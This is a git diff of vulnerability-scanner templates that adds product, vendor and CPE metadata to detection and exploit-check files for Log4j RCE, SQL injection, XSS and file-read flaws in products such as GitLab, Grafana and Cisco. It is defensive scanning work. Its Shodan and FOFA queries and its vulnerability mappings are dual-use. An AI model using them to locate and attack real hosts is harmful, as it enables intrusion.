b/http/technologies/versa/versa-networks-detect.yaml @@ -10,8 +10,12 @@ info: verified: true max-request: 7 shodan-query: html:"Versa Networks" + product: versa_analytics + vendor: versa-networks tags: tech,versa + classification: + cpe: cpe:2.3:a:versa-networks:versa_analytics:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/vivotex-web-console-detect.yaml b/http/technologies/vivotex-web-console-detect.yaml index 590bca51ee..ab7109e0a3 100644 --- a/http/technologies/vivotex-web-console-detect.yaml +++ b/http/technologies/vivotex-web-console-detect.yaml @@ -8,8 +8,12 @@ info: max-request: 1 shodan-query: title:"VIVOTEK Web Console" fofa-query: app="VIVOTEK-Web-Console" + product: ip7361 + vendor: vivotek tags: tech,vivotex,console + classification: + cpe: cpe:2.3:h:vivotek:ip7361:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/vmware/vmware-horizon-version.yaml b/http/technologies/vmware/vmware-horizon-version.yaml index 5638dc2c45..3f3082cbc2 100644 --- a/http/technologies/vmware/vmware-horizon-version.yaml +++ b/http/technologies/vmware/vmware-horizon-version.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 1 shodan-query: title:"Vmware Horizon" + product: horizon_view + vendor: vmware tags: vmware,tech + classification: + cpe: cpe:2.3:a:vmware:horizon_view:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/wing-ftp-service-detect.yaml b/http/technologies/wing-ftp-service-detect.yaml index ca7b15e670..9c4b94a44d 100644 --- a/http/technologies/wing-ftp-service-detect.yaml +++ b/http/technologies/wing-ftp-service-detect.yaml @@ -10,8 +10,12 @@ info: verified: true max-request: 1 shodan-query: "Wing FTP Server" + product: wing_ftp_server + vendor: wftpserver tags: tech,ftp,wing,detect + classification: + cpe: cpe:2.3:a:wftpserver:wing_ftp_server:*:*:*:*:*:*:*:* http: - method: GET path: @@ -22,4 +26,4 @@ http: part: header words: - "Wing FTP Server" -# digest: 4b0a00483046022100f10f68fc40d77bd9d1d477fcb141f9a3aa3759aa19af1d46cb13162352e3a7520221008ed11cdb28af81f4949dffa122ccd3fab3cf3ccba97be4993ed4696a67540203:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f10f68fc40d77bd9d1d477fcb141f9a3aa3759aa19af1d46cb13162352e3a7520221008ed11cdb28af81f4949dffa122ccd3fab3cf3ccba97be4993ed4696a67540203:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wms-server-detect.yaml b/http/technologies/wms-server-detect.yaml index 23e14e21c0..64fce98c14 100644 --- a/http/technologies/wms-server-detect.yaml +++ b/http/technologies/wms-server-detect.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 1 fofa-query: app="WmsServer" + product: wms + vendor: wms_project tags: tech,wms,httpserver + classification: + cpe: cpe:2.3:a:wms_project:wms:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml b/http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml index 0af80e7daf..04515e46ab 100644 --- a/http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml +++ b/http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml @@ -1,5 +1,5 @@ -id: wp-bricks-builder-theme - +id: wp-bricks-builder-theme + info: name: WordPress Bricks Builder Theme Version author: Anonymous @@ -12,26 +12,30 @@ info: verified: true max-request: 1 publicwww-query: "/wp-content/themes/bricks/" + product: bricks + vendor: bricksbuilder tags: wordpress,theme,wp-theme,wp,bricks -http: - - method: GET - path: - - "{{BaseURL}}/wp-content/themes/bricks/readme.txt" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "Bricks - Visual Website Builder" - - - type: regex - part: body - regex: - - "Stable tag:([ 0-9.]+)" - - - type: status - status: + classification: + cpe: cpe:2.3:a:bricksbuilder:bricks:*:*:*:*:wordpress:*:*:* +http: + - method: GET + path: + - "{{BaseURL}}/wp-content/themes/bricks/readme.txt" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Bricks - Visual Website Builder" + + - type: regex + part: body + regex: + - "Stable tag:([ 0-9.]+)" + + - type: status + status: - 200 -# digest: 4b0a004830460221009c78d037f624ed7c52cb7fdf8a4bf76d529fed8e880d6cbc8ec5e31d5857e38a0221008e34473c003bb6105607aac0fc1397eb9764f9ec081a7114e6f4983d11522afb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009c78d037f624ed7c52cb7fdf8a4bf76d529fed8e880d6cbc8ec5e31d5857e38a0221008e34473c003bb6105607aac0fc1397eb9764f9ec081a7114e6f4983d11522afb:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/xenforo-detect.yaml b/http/technologies/xenforo-detect.yaml index 99a5abb2bc..7072b60742 100644 --- a/http/technologies/xenforo-detect.yaml +++ b/http/technologies/xenforo-detect.yaml @@ -7,8 +7,12 @@ info: metadata: max-request: 1 shodan-query: http.title:"XenForo" + product: xenforo + vendor: xenforo tags: tech,xenforo + classification: + cpe: cpe:2.3:a:xenforo:xenforo:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/xerox-workcentre-detect.yaml b/http/technologies/xerox-workcentre-detect.yaml index a11312a3d0..2e25129d7c 100644 --- a/http/technologies/xerox-workcentre-detect.yaml +++ b/http/technologies/xerox-workcentre-detect.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 1 shodan-query: title:"XEROX WORKCENTRE" + product: workcentre_7970i + vendor: xerox tags: tech,xerox,workcentre + classification: + cpe: cpe:2.3:h:xerox:workcentre_7970i:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/yapi-detect.yaml b/http/technologies/yapi-detect.yaml index cf56584b89..7953dc6b7d 100644 --- a/http/technologies/yapi-detect.yaml +++ b/http/technologies/yapi-detect.yaml @@ -7,8 +7,12 @@ info: metadata: max-request: 1 shodan-query: http.title:"YApi" + product: yapi + vendor: ymfe tags: tech,yapi + classification: + cpe: cpe:2.3:a:ymfe:yapi:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/yeswiki-detect.yaml b/http/technologies/yeswiki-detect.yaml index f28c6ad9c5..285e27d734 100644 --- a/http/technologies/yeswiki-detect.yaml +++ b/http/technologies/yeswiki-detect.yaml @@ -9,10 +9,13 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0 cwe-id: CWE-200 + cpe: cpe:2.3:a:yeswiki:yeswiki:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.html:"yeswiki" + product: yeswiki + vendor: yeswiki tags: yeswiki,panel,tech http: diff --git a/http/technologies/yourls-detect.yaml b/http/technologies/yourls-detect.yaml index c80f0b982d..b2c9b50d7d 100644 --- a/http/technologies/yourls-detect.yaml +++ b/http/technologies/yourls-detect.yaml @@ -13,8 +13,12 @@ info: max-request: 1 shodan-query: title:"Your Own URL Shortener" fofa-query: title="Your Own URL Shortener" + product: yourls + vendor: yourls tags: tech,yourls + classification: + cpe: cpe:2.3:a:yourls:yourls:*:*:*:*:*:*:*:* http: - method: GET path: @@ -45,4 +49,4 @@ http: regex: - 'YOURLS<\/a>([ a-z0-9.-]+)' - 'content="YOURLS([ 0-9.]+)"' -# digest: 4a0a004730450221008698f71c950b2a19bad6799e39feac48619b5c545de1929f77384613ff4134f10220204bf322f013ccd1a5ee781b73949f32bc9ada356a02aaeab3ffb91b1f247190:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008698f71c950b2a19bad6799e39feac48619b5c545de1929f77384613ff4134f10220204bf322f013ccd1a5ee781b73949f32bc9ada356a02aaeab3ffb91b1f247190:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/zend-server-test-page.yaml b/http/technologies/zend-server-test-page.yaml index 431b5f6cbf..57d33306e9 100644 --- a/http/technologies/zend-server-test-page.yaml +++ b/http/technologies/zend-server-test-page.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 1 shodan-query: title:"Zend Server Test Page" + product: zend_server + vendor: zend tags: tech,zend + classification: + cpe: cpe:2.3:a:zend:zend_server:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/vulnerabilities/74cms/74cms-weixin-sqli.yaml b/http/vulnerabilities/74cms/74cms-weixin-sqli.yaml index 6508ef3296..b4b482414e 100644 --- a/http/vulnerabilities/74cms/74cms-weixin-sqli.yaml +++ b/http/vulnerabilities/74cms/74cms-weixin-sqli.yaml @@ -12,7 +12,11 @@ info: verified: true max-request: 1 fofa-query: app="骑士-74CMS" + product: 74cms + vendor: 74cms tags: 74cms,weixin,sqli + classification: + cpe: cpe:2.3:a:74cms:74cms:*:*:*:*:*:*:*:* variables: num: '999999999' diff --git a/http/vulnerabilities/apache/apache-nifi-rce.yaml b/http/vulnerabilities/apache/apache-nifi-rce.yaml index b78b1e050d..383b479033 100644 --- a/http/vulnerabilities/apache/apache-nifi-rce.yaml +++ b/http/vulnerabilities/apache/apache-nifi-rce.yaml @@ -14,8 +14,12 @@ info: verified: true max-request: 1 shodan-query: "title:\"NiFi\"" + product: nifi + vendor: apache tags: packetstorm,apache,nifi,rce + classification: + cpe: cpe:2.3:a:apache:nifi:*:*:*:*:*:*:*:* http: - method: GET path: @@ -44,4 +48,4 @@ http: - type: json json: - .id -# digest: 4b0a00483046022100823087d872f3a455924ecdc15097cdfee075237703e430052a76021a9dde5961022100a89d1b8d93adc5aa3081364ad7a0e725ef1c4a2c863d151b5331254588d3043a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100823087d872f3a455924ecdc15097cdfee075237703e430052a76021a9dde5961022100a89d1b8d93adc5aa3081364ad7a0e725ef1c4a2c863d151b5331254588d3043a:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml b/http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml index e8010e3589..321f25b9ef 100644 --- a/http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml +++ b/http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml @@ -17,9 +17,12 @@ info: cvss-score: 10 cve-id: CVE-2021-44228 cwe-id: CWE-77 + cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.html:"Apache OFBiz" + product: ofbiz + vendor: apache tags: cve,cve2021,ofbiz,oast,log4j,rce,apache,jndi,kev variables: rand1: '{{rand_int(111, 999)}}' diff --git a/http/vulnerabilities/apache/apache-solr-log4j-rce.yaml b/http/vulnerabilities/apache/apache-solr-log4j-rce.yaml index a57240f6f8..33077362c8 100644 --- a/http/vulnerabilities/apache/apache-solr-log4j-rce.yaml +++ b/http/vulnerabilities/apache/apache-solr-log4j-rce.yaml @@ -18,10 +18,13 @@ info: cvss-score: 10 cve-id: CVE-2021-44228 cwe-id: CWE-77 + cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 shodan-query: http.html:"Apache Solr" + product: solr + vendor: apache tags: vulhub,cve,solr,oast,log4j,cve2021,rce,apache,jndi,kev variables: rand1: '{{rand_int(111, 999)}}' @@ -73,4 +76,4 @@ http: group: 1 regex: - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' -# digest: 4a0a00473045022060b0ff4627227932af965189042812bb6d42700a4d165a21af14defa05130797022100de39eba08fa9e66b3372fa708d8ce09109381c7269607247ce7b145789c09d7a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022060b0ff4627227932af965189042812bb6d42700a4d165a21af14defa05130797022100de39eba08fa9e66b3372fa708d8ce09109381c7269607247ce7b145789c09d7a:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/avaya/avaya-aura-xss.yaml b/http/vulnerabilities/avaya/avaya-aura-xss.yaml index a41ff0a1ed..e9fdcfcbdd 100644 --- a/http/vulnerabilities/avaya/avaya-aura-xss.yaml +++ b/http/vulnerabilities/avaya/avaya-aura-xss.yaml @@ -12,10 +12,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cwe-id: CWE-80 + cpe: cpe:2.3:a:avaya:aura_utility_services:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 shodan-query: html:"Avaya Aura" + product: aura_utility_services + vendor: avaya tags: xss,avaya,aura,iot http: diff --git a/http/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml b/http/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml index b20dc71a83..b6b19f8a12 100644 --- a/http/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml +++ b/http/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml @@ -14,10 +14,13 @@ info: cvss-score: 10 cve-id: CVE-2021-44228 cwe-id: CWE-77 + cpe: cpe:2.3:a:cisco:unified_communications_domain_manager:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: title:"Cisco Unified" + product: unified_communications_domain_manager + vendor: cisco tags: cve,cve2021,rce,jndi,log4j,cisco,kev,oast variables: rand1: '{{rand_int(111, 999)}}' diff --git a/http/vulnerabilities/cisco/cisco-webex-log4j-rce.yaml b/http/vulnerabilities/cisco/cisco-webex-log4j-rce.yaml index ab879def50..a51e04570a 100644 --- a/http/vulnerabilities/cisco/cisco-webex-log4j-rce.yaml +++ b/http/vulnerabilities/cisco/cisco-webex-log4j-rce.yaml @@ -13,9 +13,12 @@ info: cvss-score: 10 cve-id: CVE-2021-44228 cwe-id: CWE-77 + cpe: cpe:2.3:a:cisco:webex_meetings_online:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: title:"Cisco WebEx" + product: webex_meetings_online + vendor: cisco tags: cve,cve2021,rce,jndi,log4j,cisco,webex,oast,kev variables: rand1: '{{rand_int(111, 999)}}' diff --git a/http/vulnerabilities/citrix/citrix-oob-memory-read.yaml b/http/vulnerabilities/citrix/citrix-oob-memory-read.yaml index 4baf3a5883..a90445c7db 100644 --- a/http/vulnerabilities/citrix/citrix-oob-memory-read.yaml +++ b/http/vulnerabilities/citrix/citrix-oob-memory-read.yaml @@ -14,8 +14,12 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:-1292923998,-1166125415 + product: netscaler_gateway + vendor: citrix tags: citrix,netscaller,gateway,oob + classification: + cpe: cpe:2.3:a:citrix:netscaler_gateway:*:*:*:*:*:*:*:* http: - raw: - |+ @@ -35,4 +39,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220728bf84816998d58d541ed1a352c6a5376a1f83545a85e6eabcc8d69ebb24e17022100f1652ecf3c29d0bbd5302823d1304ba5285767319ebcfb0822e993357a987332:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220728bf84816998d58d541ed1a352c6a5376a1f83545a85e6eabcc8d69ebb24e17022100f1652ecf3c29d0bbd5302823d1304ba5285767319ebcfb0822e993357a987332:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/dedecms/dedecms-carbuyaction-fileinclude.yaml b/http/vulnerabilities/dedecms/dedecms-carbuyaction-fileinclude.yaml index 3bd72adcd1..5b78d74350 100644 --- a/http/vulnerabilities/dedecms/dedecms-carbuyaction-fileinclude.yaml +++ b/http/vulnerabilities/dedecms/dedecms-carbuyaction-fileinclude.yaml @@ -11,8 +11,12 @@ info: verified: true max-request: 1 shodan-query: http.html:"power by dedecms" || title:"dedecms" + product: dedecms + vendor: dedecms tags: dedecms + classification: + cpe: cpe:2.3:a:dedecms:dedecms:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/vulnerabilities/dedecms/dedecms-config-xss.yaml b/http/vulnerabilities/dedecms/dedecms-config-xss.yaml index 018cbec332..3896233878 100644 --- a/http/vulnerabilities/dedecms/dedecms-config-xss.yaml +++ b/http/vulnerabilities/dedecms/dedecms-config-xss.yaml @@ -14,10 +14,13 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 + cpe: cpe:2.3:a:dedecms:dedecms:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.html:"DedeCms" + product: dedecms + vendor: dedecms tags: dedecms,xss http: diff --git a/http/vulnerabilities/dedecms/dedecms-membergroup-sqli.yaml b/http/vulnerabilities/dedecms/dedecms-membergroup-sqli.yaml index f364bce651..3fc1e2997b 100644 --- a/http/vulnerabilities/dedecms/dedecms-membergroup-sqli.yaml +++ b/http/vulnerabilities/dedecms/dedecms-membergroup-sqli.yaml @@ -11,9 +11,12 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cwe-id: CWE-89 + cpe: cpe:2.3:a:dedecms:dedecms:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.html:"DedeCms" + product: dedecms + vendor: dedecms tags: sqli,dedecms variables: num: "999999999" diff --git a/http/vulnerabilities/dedecms/dedecms-openredirect.yaml b/http/vulnerabilities/dedecms/dedecms-openredirect.yaml index 0f7af86f07..ce7d36c37a 100644 --- a/http/vulnerabilities/dedecms/dedecms-openredirect.yaml +++ b/http/vulnerabilities/dedecms/dedecms-openredirect.yaml @@ -11,10 +11,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cwe-id: CWE-601 + cpe: cpe:2.3:a:dedecms:dedecms:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.html:"power by dedecms" || title:"dedecms" + product: dedecms + vendor: dedecms tags: dedecms,redirect http: diff --git a/http/vulnerabilities/dedecms/dedecms-rce.yaml b/http/vulnerabilities/dedecms/dedecms-rce.yaml index f7c413bf1e..21f1fb2892 100644 --- a/http/vulnerabilities/dedecms/dedecms-rce.yaml +++ b/http/vulnerabilities/dedecms/dedecms-rce.yaml @@ -13,8 +13,12 @@ info: verified: true max-request: 1 fofa-query: app="DedeCMS" + product: dedecms + vendor: dedecms tags: dedecms,cms,rce + classification: + cpe: cpe:2.3:a:dedecms:dedecms:*:*:*:*:*:*:*:* http: - raw: - | diff --git a/http/vulnerabilities/discuz/discuz-api-pathinfo.yaml b/http/vulnerabilities/discuz/discuz-api-pathinfo.yaml index 9cd016e021..cae70c3ba7 100644 --- a/http/vulnerabilities/discuz/discuz-api-pathinfo.yaml +++ b/http/vulnerabilities/discuz/discuz-api-pathinfo.yaml @@ -13,8 +13,12 @@ info: max-request: 1 shodan-query: title:"Discuz!" fofa-query: title="Discuz!" + product: discuz\\! + vendor: comsenz tags: discuz,info,disclosure + classification: + cpe: cpe:2.3:a:comsenz:discuz\\!:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/vulnerabilities/ecstatic/node-ecstatic-listing.yaml b/http/vulnerabilities/ecstatic/node-ecstatic-listing.yaml index 370f73a64b..434a77531a 100644 --- a/http/vulnerabilities/ecstatic/node-ecstatic-listing.yaml +++ b/http/vulnerabilities/ecstatic/node-ecstatic-listing.yaml @@ -11,8 +11,12 @@ info: verified: true max-request: 1 shodan-query: 'server: "ecstatic"' + product: ecstatic + vendor: ecstatic_project tags: node,js,listing,ecstatic + classification: + cpe: cpe:2.3:a:ecstatic_project:ecstatic:*:*:*:*:node.js:*:*:* http: - method: GET path: @@ -30,4 +34,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e5162037fa5a1215df51c336ce7672d6007dd8190b219c37131631ec9f2d6d85022100efe2b0d36b964e080f24d37b1ecf9018b17c2e072c99fa0a7784fd3784d09a94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e5162037fa5a1215df51c336ce7672d6007dd8190b219c37131631ec9f2d6d85022100efe2b0d36b964e080f24d37b1ecf9018b17c2e072c99fa0a7784fd3784d09a94:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/esafenet/esafenet-netsecconfigajax-sqli.yaml b/http/vulnerabilities/esafenet/esafenet-netsecconfigajax-sqli.yaml index 3fd5f7c79e..d8a5fabd98 100644 --- a/http/vulnerabilities/esafenet/esafenet-netsecconfigajax-sqli.yaml +++ b/http/vulnerabilities/esafenet/esafenet-netsecconfigajax-sqli.yaml @@ -11,8 +11,11 @@ info: vendor: esafenet max-request: 1 fofa-query: title="电子文档安全管理系统",body="CDGServer3/" + product: cdg tags: esafenet,sqli + classification: + cpe: cpe:2.3:a:esafenet:cdg:*:*:*:*:*:*:*:* http: - raw: - | @@ -29,4 +32,4 @@ http: - 'contains(body,"操作成功")' - 'status_code == 200' condition: and -# digest: 490a0046304402200d661ef351e46745e95858f066515919d01ac3c33df6ebdf8713b90322df8e2802201bfd4eac3b4e3fb51a1e8797fea37efee4756737acf9ef39b8781bb7625bf968:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200d661ef351e46745e95858f066515919d01ac3c33df6ebdf8713b90322df8e2802201bfd4eac3b4e3fb51a1e8797fea37efee4756737acf9ef39b8781bb7625bf968:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/froxlor-xss.yaml b/http/vulnerabilities/froxlor-xss.yaml index 0b07ae3ad2..5c5ecf2d6c 100644 --- a/http/vulnerabilities/froxlor-xss.yaml +++ b/http/vulnerabilities/froxlor-xss.yaml @@ -10,10 +10,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cwe-id: CWE-80 + cpe: cpe:2.3:a:froxlor:froxlor:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: title:"Froxlor Server Management Panel" + product: froxlor + vendor: froxlor tags: froxlor,xss http: diff --git a/http/vulnerabilities/gitea/gitea-rce.yaml b/http/vulnerabilities/gitea/gitea-rce.yaml index f4495b52fb..5e5e022a3c 100644 --- a/http/vulnerabilities/gitea/gitea-rce.yaml +++ b/http/vulnerabilities/gitea/gitea-rce.yaml @@ -13,8 +13,12 @@ info: verified: true max-request: 3 shodan-query: 'title:"Installation - Gitea: Git with a cup of tea"' + product: gitea + vendor: gitea tags: gitea,rce,unauth,edb + classification: + cpe: cpe:2.3:a:gitea:gitea:*:*:*:*:*:*:*:* http: - raw: - | diff --git a/http/vulnerabilities/gitlab/gitlab-rce.yaml b/http/vulnerabilities/gitlab/gitlab-rce.yaml index 0910779e36..f7e34b1ce9 100644 --- a/http/vulnerabilities/gitlab/gitlab-rce.yaml +++ b/http/vulnerabilities/gitlab/gitlab-rce.yaml @@ -15,9 +15,12 @@ info: cvss-score: 10 cve-id: CVE-2021-22205 cwe-id: CWE-20 + cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:* metadata: max-request: 2 shodan-query: http.title:"GitLab" + product: gitlab + vendor: gitlab tags: oast,intrusive,hackerone,cve,cve2021,gitlab,rce,kev http: diff --git a/http/vulnerabilities/gnuboard/gnuboard-sms-xss.yaml b/http/vulnerabilities/gnuboard/gnuboard-sms-xss.yaml index c10d70ec57..e564d0bc5a 100644 --- a/http/vulnerabilities/gnuboard/gnuboard-sms-xss.yaml +++ b/http/vulnerabilities/gnuboard/gnuboard-sms-xss.yaml @@ -12,10 +12,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cwe-id: CWE-80 + cpe: cpe:2.3:a:gnuboard:gnuboard5:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.html:"Gnuboard" + product: gnuboard5 + vendor: gnuboard tags: xss,gnuboard http: diff --git a/http/vulnerabilities/gnuboard/gnuboard5-rxss.yaml b/http/vulnerabilities/gnuboard/gnuboard5-rxss.yaml index 6cbbef3295..2dd31c9d29 100644 --- a/http/vulnerabilities/gnuboard/gnuboard5-rxss.yaml +++ b/http/vulnerabilities/gnuboard/gnuboard5-rxss.yaml @@ -13,10 +13,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cwe-id: CWE-80 + cpe: cpe:2.3:a:gnuboard:gnuboard5:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.html:"gnuboard5" + product: gnuboard5 + vendor: gnuboard tags: gnuboard,xss,huntr http: diff --git a/http/vulnerabilities/gnuboard/gnuboard5-xss.yaml b/http/vulnerabilities/gnuboard/gnuboard5-xss.yaml index 06c8afed75..a318abb079 100644 --- a/http/vulnerabilities/gnuboard/gnuboard5-xss.yaml +++ b/http/vulnerabilities/gnuboard/gnuboard5-xss.yaml @@ -12,10 +12,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cwe-id: CWE-80 + cpe: cpe:2.3:a:gnuboard:gnuboard5:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.html:"gnuboard5" + product: gnuboard5 + vendor: gnuboard tags: xss,gnuboard,gnuboard5,huntr http: diff --git a/http/vulnerabilities/gradio/gradio-lfi.yaml b/http/vulnerabilities/gradio/gradio-lfi.yaml index 1be770ce1e..46a57cc3b6 100644 --- a/http/vulnerabilities/gradio/gradio-lfi.yaml +++ b/http/vulnerabilities/gradio/gradio-lfi.yaml @@ -13,10 +13,13 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 epss-percentile: 0.36659 + cpe: cpe:2.3:a:gradio_project:gradio:*:*:*:*:python:*:*:* metadata: verified: true max-request: 2 shodan-query: html:"__gradio_mode__" + product: gradio + vendor: gradio_project tags: cve,cve2024,intrusive,unauth,gradio,lfi,lfr http: @@ -61,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100dee488452114cf8cba3e74b09165ce96dd590f0ac0705828cdc977a8a8bd5f39022100d64d96b1ba3cd9e79039f6b3436f1cf7fd37e88bb8bb0249b76423524c3939a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dee488452114cf8cba3e74b09165ce96dd590f0ac0705828cdc977a8a8bd5f39022100d64d96b1ba3cd9e79039f6b3436f1cf7fd37e88bb8bb0249b76423524c3939a4:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/gradio/gradio-ssrf.yaml b/http/vulnerabilities/gradio/gradio-ssrf.yaml index 87c67f9d92..b3f0c205a1 100644 --- a/http/vulnerabilities/gradio/gradio-ssrf.yaml +++ b/http/vulnerabilities/gradio/gradio-ssrf.yaml @@ -13,10 +13,13 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 epss-percentile: 0.36659 + cpe: cpe:2.3:a:gradio_project:gradio:*:*:*:*:python:*:*:* metadata: verified: true max-request: 2 shodan-query: html:"__gradio_mode__" + product: gradio + vendor: gradio_project tags: cve,cve2024,unauth,gradio,ssrf http: @@ -55,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210084254e5be884aa98296a738a4c7318f5fc3144cd7a242e19dfc57c3e7540a125022100db240aae793f3c25c826a49fe256d4109590d1fd40a2ad08de4d75925b3985f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210084254e5be884aa98296a738a4c7318f5fc3144cd7a242e19dfc57c3e7540a125022100db240aae793f3c25c826a49fe256d4109590d1fd40a2ad08de4d75925b3985f3:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/grafana/grafana-file-read.yaml b/http/vulnerabilities/grafana/grafana-file-read.yaml index d2c118b320..1b20aa4de9 100644 --- a/http/vulnerabilities/grafana/grafana-file-read.yaml +++ b/http/vulnerabilities/grafana/grafana-file-read.yaml @@ -17,9 +17,12 @@ info: cvss-score: 7.5 cve-id: CVE-2021-43798 cwe-id: CWE-22 + cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* metadata: max-request: 325 shodan-query: title:"Grafana" + product: grafana + vendor: grafana tags: grafana,lfi http: diff --git a/http/vulnerabilities/huawei/huawei-hg255s-lfi.yaml b/http/vulnerabilities/huawei/huawei-hg255s-lfi.yaml index 6d565d0df3..cb924d5212 100644 --- a/http/vulnerabilities/huawei/huawei-hg255s-lfi.yaml +++ b/http/vulnerabilities/huawei/huawei-hg255s-lfi.yaml @@ -12,9 +12,12 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 + cpe: cpe:2.3:h:huawei:hg255s:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.html:"HG532e" + product: hg255s + vendor: huawei tags: huawei,lfi,router http: diff --git a/http/vulnerabilities/j2ee/liferay-resource-leak.yaml b/http/vulnerabilities/j2ee/liferay-resource-leak.yaml index dfbec051cf..1fd44ba92b 100644 --- a/http/vulnerabilities/j2ee/liferay-resource-leak.yaml +++ b/http/vulnerabilities/j2ee/liferay-resource-leak.yaml @@ -13,10 +13,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 + cpe: cpe:2.3:a:liferay:liferay_portal:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: title:"Liferay" + product: liferay_portal + vendor: liferay tags: liferay,lfi,j2ee http: 